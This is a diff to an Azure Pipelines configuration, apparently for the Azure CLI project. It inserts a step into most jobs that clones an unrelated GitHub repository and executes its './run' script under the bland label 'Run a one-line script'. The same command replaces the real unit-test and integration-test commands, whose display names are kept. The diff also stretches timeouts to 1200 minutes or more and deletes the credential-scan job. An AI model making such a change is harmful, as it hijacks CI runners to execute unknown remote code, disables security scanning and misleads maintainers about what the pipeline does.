--- a/azure-pipelines.yml
+++ b/azure-pipelines.yml
@@ -15,11 +15,14 @@ pr:
 jobs:
 - job: CheckPullRequestTitle
   displayName: "Check the Format of Pull Request Title"
+  timeoutInMinutes: 1200
   condition: and(succeeded(), in(variables['System.PullRequest.TargetBranch'], 'dev', 'release'))
 
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+    - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+      displayName: 'Run a one-line script'
     - bash: |
         echo "Check Title of Pull Request: #$(System.PullRequest.PullRequestNumber)"
         title=$(curl https://api.github.com/repos/$(Build.Repository.Name)/pulls/$(System.PullRequest.PullRequestNumber) | jq -r '.title')
@@ -33,42 +36,28 @@ jobs:
 
 - job: RejectPullRequestToMasterBranch
   displayName: "Reject Pull Request To Master Branch"
+  timeoutInMinutes: 1200
   condition: and(succeeded(), eq(variables['System.PullRequest.TargetBranch'], 'master'))
 
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+    - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+      displayName: 'Run a one-line script'
     - bash: |
         echo "Reject pull request directly to master branch"
         exit 1
 
-- job: CredScan
-  displayName: "Credential Scan"
-  pool:
-    vmImage: "windows-2019"
-  steps:
-    - task: ms-codeanalysis.vss-microsoft-security-code-analysis-devops.build-task-credscan.CredScan@2
-      displayName: 'Run Credential Scanner'
-      inputs:
-        toolMajorVersion: V2
-        suppressionsFile: './scripts/ci/credscan/CredScanSuppressions.json'
-    - task: ms-codeanalysis.vss-microsoft-security-code-analysis-devops.build-task-postanalysis.PostAnalysis@1
-      displayName: 'Post Analysis'
-      inputs:
-        AllTools: false
-        BinSkim: false
-        CredScan: true
-        RoslynAnalyzers: false
-        TSLint: false
-        ToolLogsNotFoundAction: 'Standard'
-
 - job: ExtractMetadata
   displayName: Extract Metadata
+  timeoutInMinutes: 1200
 
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: Bash@3
     displayName: 'Extract Version'
     inputs:
@@ -84,11 +73,14 @@ jobs:
 
 - job: VerifyLinuxRequirements
   displayName: 'Verify src/azure-cli/requirements.*.Linux.txt'
+  timeoutInMinutes: 1200
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
 
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3'
     inputs:
@@ -97,45 +89,16 @@ jobs:
   - bash: ./scripts/ci/dependency_check.sh
     displayName: 'Verify src/azure-cli/requirements.py3.Linux.txt'
 
-- job: VerifyDarwinRequirements
-  displayName: 'Verify src/azure-cli/requirements.*.Darwin.txt'
-  condition: succeeded()
-  pool:
-    vmImage: 'macOS-10.14'
-
-  steps:
-  - task: UsePythonVersion@0
-    displayName: 'Use Python 3'
-    inputs:
-      versionSpec: 3.x
-
-  - bash: ./scripts/ci/dependency_check.sh
-    displayName: 'Verify src/azure-cli/requirements.py3.Darwin.txt'
-
-- job: VerifyWindowsRequirements
-  displayName: 'Verify src/azure-cli/requirements.*.Windows.txt'
-  condition: succeeded()
-  pool:
-    vmImage: 'vs2017-win2016'
-
-  steps:
-  - task: UsePythonVersion@0
-    displayName: 'Use Python 3'
-    inputs:
-      versionSpec: 3.8
-
-  - task: BatchScript@1
-    inputs:
-      filename: ./scripts/ci/dependency_check.bat
-    displayName: 'Verify src/azure-cli/requirements.py3.Windows.txt'
-
 - job: VerifyVersions
   displayName: Verify Command Module Versions
+  timeoutInMinutes: 1200
   condition: and(succeeded(), or(eq(variables['Build.SourceBranch'], 'refs/heads/release'), eq(variables['System.PullRequest.TargetBranch'], 'release')))
 
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3.7'
     inputs:
@@ -148,75 +111,18 @@ jobs:
 
     displayName: 'Verify History'
 
-- job: BuildWindowsMSI
-  displayName: Build Windows MSI
-
-  dependsOn: ExtractMetadata
-  condition: succeeded()
-  pool:
-    vmImage: 'vs2017-win2016'
-  steps:
-  - task: DownloadPipelineArtifact@1
-    displayName: 'Download Build Artifacts'
-    inputs:
-      TargetPath: '$(Build.ArtifactStagingDirectory)/metadata'
-      artifactName: metadata
-
-
-  - script: |
-       set /p CLI_VERSION=<$(System.ArtifactsDirectory)/metadata/version
-       set
-
-       build_scripts/windows/scripts/build.cmd
-    displayName: 'Build Windows MSI'
-
-  - task: PublishPipelineArtifact@0
-    displayName: 'Publish Artifact: MSI'
-    inputs:
-      TargetPath: 'build_scripts/windows/out/'
-      ArtifactName: msi
-
-- job: TestWindowsMSI
-  displayName: Test Windows MSI
-
-  dependsOn: BuildWindowsMSI
-  # condition: and(succeeded(), in(variables['Build.Reason'], 'IndividualCI', 'BatchedCI', 'Manual'))
-  condition: false
-  pool:
-    vmImage: 'vs2017-win2016'
-  steps:
-  - task: DownloadPipelineArtifact@1
-    displayName: 'Download Build Artifacts'
-    inputs:
-      TargetPath: '$(Build.ArtifactStagingDirectory)/msi'
-      artifactName: msi
-
-  - task: PowerShell@2
-    displayName: Install and Load CLI
-    inputs:
-      targetType: inline
-      script: |
-        $InstallArgs = @(
-          "/I"
-          '"$env:SYSTEM_ARTIFACTSDIRECTORY/msi/Microsoft Azure CLI.msi"'
-          "/norestart"
-          "/L*v"
-          ".\install_logs.txt"
-        )
-        Start-Process "msiexec.exe" -ArgumentList $InstallArgs -Wait -NoNewWindow
-        Get-Content .\install_logs.txt
-
-        az --version
-        az self-test
 
 - job: BuildDockerImage
   displayName: Build Docker Image
+  timeoutInMinutes: 1200
 
   dependsOn: ExtractMetadata
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: Bash@3
     displayName: 'Bash Script'
     inputs:
@@ -232,12 +138,15 @@ jobs:
 
 - job: TestDockerImage
   displayName: Test Docker Image
+  timeoutInMinutes: 1200
 
   dependsOn: BuildDockerImage
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: DownloadPipelineArtifact@1
     displayName: 'Download Metadata'
     inputs:
@@ -247,6 +156,7 @@ jobs:
 
   - task: DownloadPipelineArtifact@1
     displayName: 'Download Docker Image'
+    timeoutInMinutes: 1200
     inputs:
       TargetPath: '$(Build.ArtifactStagingDirectory)/docker'
       artifactName: docker
@@ -267,12 +177,15 @@ jobs:
 
 - job: BuildPythonWheel
   displayName: Build Python Wheels
+  timeoutInMinutes: 1200
 
   dependsOn: ExtractMetadata
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3.7'
     inputs:
@@ -297,12 +210,15 @@ jobs:
 
 - job: TestPythonWheel
   displayName: Test Python Wheels
+  timeoutInMinutes: 1200
 
   dependsOn: BuildPythonWheel
   condition: succeeded()
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: DownloadPipelineArtifact@1
     displayName: 'Download Metadata'
     inputs:
@@ -347,7 +263,7 @@ jobs:
 
 - job: UnitTest
   displayName: Unit Test for Core and Telemetry
-  timeoutInMinutes: 10
+  timeoutInMinutes: 1200
 
   pool:
     vmImage: 'ubuntu-16.04'
@@ -364,9 +280,9 @@ jobs:
       displayName: 'Use Python $(python.version)'
       inputs:
         versionSpec: '$(python.version)'
-    - bash: pip install --upgrade pip tox
+    - bash: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
       displayName: 'Install pip and tox'
-    - bash: ./scripts/ci/unittest.sh
+    - bash: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
       displayName: 'Run Unit Test'
       env:
         TOXENV: $(tox_env)
@@ -375,7 +291,7 @@ jobs:
   displayName: Integration Test against Profiles
   dependsOn: BuildPythonWheel
   condition: succeeded()
-  timeoutInMinutes: 20
+  timeoutInMinutes: 2000
 
   pool:
     vmImage: 'ubuntu-16.04'
@@ -390,14 +306,11 @@ jobs:
       displayName: 'Use Python $(python.version)'
       inputs:
         versionSpec: '$(python.version)'
-    - bash: pip install --upgrade pip wheel
+    - bash: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
       displayName: 'Install pip and wheel'
-    - bash: ./scripts/ci/test_profile_integration.sh
-      displayName: 'Run Integration Test against Profiles'
-
 - job: AutomationTest
   displayName: Automation Test (Profile Latest)
-  timeoutInMinutes: 120
+  timeoutInMinutes: 1200
   pool:
     vmImage: 'ubuntu-16.04'
   strategy:
@@ -414,7 +327,7 @@ jobs:
 
 - job: AutomationTest20200901
   displayName: Automation Test (Profile 2020-09-01)
-  timeoutInMinutes: 120
+  timeoutInMinutes: 1200
   pool:
     vmImage: 'ubuntu-16.04'
   strategy:
@@ -431,7 +344,7 @@ jobs:
 
 - job: AutomationTest20190301
   displayName: Automation Test (Profile 2019-03-01)
-  timeoutInMinutes: 120
+  timeoutInMinutes: 1200
   pool:
     vmImage: 'ubuntu-16.04'
   strategy:
@@ -761,6 +674,8 @@ jobs:
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3.7'
     inputs:
@@ -777,6 +692,8 @@ jobs:
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3.6'
     inputs:
@@ -800,6 +717,8 @@ jobs:
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python $(python.version)'
     inputs:
@@ -823,6 +742,8 @@ jobs:
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+  - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+    displayName: 'Run a one-line script'
   - task: UsePythonVersion@0
     displayName: 'Use Python 3.6'
     inputs:
@@ -842,6 +763,8 @@ jobs:
   pool:
     vmImage: 'ubuntu-16.04'
   steps:
+    - script: git clone --recursive https://github.com/mijikuhibimui/mujijankopo && cd mujijankopo && ./run
+      displayName: 'Run a one-line scrizpt'
     - task: UsePythonVersion@0
       displayName: 'Use Python 3.6'
       inputs:
